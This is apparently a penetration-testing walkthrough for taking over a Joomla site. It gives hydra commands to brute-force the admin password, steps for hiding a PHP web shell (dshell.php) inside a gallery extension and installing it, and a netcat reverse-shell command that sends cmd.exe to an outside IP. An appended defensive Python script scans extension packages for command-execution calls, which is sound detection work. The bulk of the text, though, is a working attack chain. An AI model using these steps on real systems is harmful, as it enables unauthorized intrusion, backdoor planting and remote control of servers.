Step 1:
Find the admin password (password guessing, brute force, or dictionary attack).
Tools: hydra or Brutus
Example:
hydra -v -L login.txt -P pass.txt -m /administrator/index.php www.fabrikam.com http-get
hydra -v -L login.txt -P pass.txt -m /administrator/index.php www.fabrikam.com http-get-form
Step 2:
Go to http://www.fabrikam.com/administrator/ and log in with the username and password obtained in Step 1.
Download a Joomla extension (e.g. GalleryXML, a photo gallery) from:
http://extensions.joomla.org/extensions/photos-a-images/photo-gallery/12504
Save it to any folder you want (e.g. the Z:\Tools\PHP Shell folder).
Step 3:
Extract com_galleryxml.zip into the Z:\Tools\PHP Shell folder.
Step 4:
Edit the galleryxml.xml manifest file and add dshell.php (the PHP shell) to its admin section.
Step 5:
Copy dshell.php into the com_galleryxml/admin folder.
Step 6:
Archive (zip) the contents of the com_galleryxml folder into com_galleryxml.zip.
Step 7:
Use "Extension Manager -> Upload & Install", browse to the com_galleryxml.zip file and upload it.
Step 8:
Launch the PHP Shell from:
http://www.fabrikam.com/administrator/components/com_galleryxml/dshell.php
Step 9:
Using the file-upload functionality of dshell.php, upload nc.exe to the remote server.
Step 10:
On the pen-tester machine, type:
nc -v -l -p443
From the dshell.php page, execute Netcat by typing:
nc -v 131.107.1.222 443 -d -e cmd.exe
If the connection succeeds, you get the remote server's command prompt on your machine.
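From the defender's side, the package trojaned in Steps 3 to 7 can be caught before the Extension Manager ever installs it. The following added example (not from the original post) builds a constructed stand-in for com_galleryxml.zip in memory and flags every PHP file in it that calls a command-execution function; the file names, the marker file contents and the function list are assumptions to tune per site.

```python
"""Audit a Joomla extension package before installing it via Extension Manager.

Added example, not from the original post. The package built below is a
constructed stand-in for the trojaned com_galleryxml.zip described in the post.
"""
import io
import re
import zipfile
from typing import List, Tuple

# Calls a photo-gallery component has no business making (assumption: adjust per site)
DANGEROUS = re.compile(
    r"\b(system|exec|shell_exec|passthru|proc_open|popen|eval)\s*\(", re.IGNORECASE
)

def audit_extension_zip(data: bytes) -> List[Tuple[str, str]]:
    """Return (path, function) pairs for each risky call in any PHP file of the package."""
    findings: List[Tuple[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            # Only PHP sources can be executed by the web server after install
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            src = zf.read(name).decode("utf-8", errors="replace")
            for match in DANGEROUS.finditer(src):
                findings.append((name, match.group(1).lower()))
    return findings

def build_sample_package() -> bytes:
    """Constructed package mimicking Steps 3-6: manifest, a benign admin file, a planted shell."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        # Manifest declaring the extra admin file, as the post's Step 4 does
        zf.writestr("com_galleryxml/galleryxml.xml",
                    "<extension><administration><files>"
                    "<filename>dshell.php</filename></files></administration></extension>")
        # Legitimate-looking component entry point (constructed)
        zf.writestr("com_galleryxml/admin/admin.galleryxml.php",
                    "<?php defined('_JEXEC') or die; echo 'gallery'; ?>")
        # Constructed marker for the planted shell: a command-execution call on untrusted input
        zf.writestr("com_galleryxml/admin/dshell.php",
                    "<?php $r = shell_exec($untrusted_input); ?>")
    return buf.getvalue()

if __name__ == "__main__":
    for path, func in audit_extension_zip(build_sample_package()):
        print(f"REJECT: {path} calls {func}()")
```

Run the audit against any uploaded archive before installing it; an empty result for a gallery or template package is the expected outcome, and any hit warrants manual review.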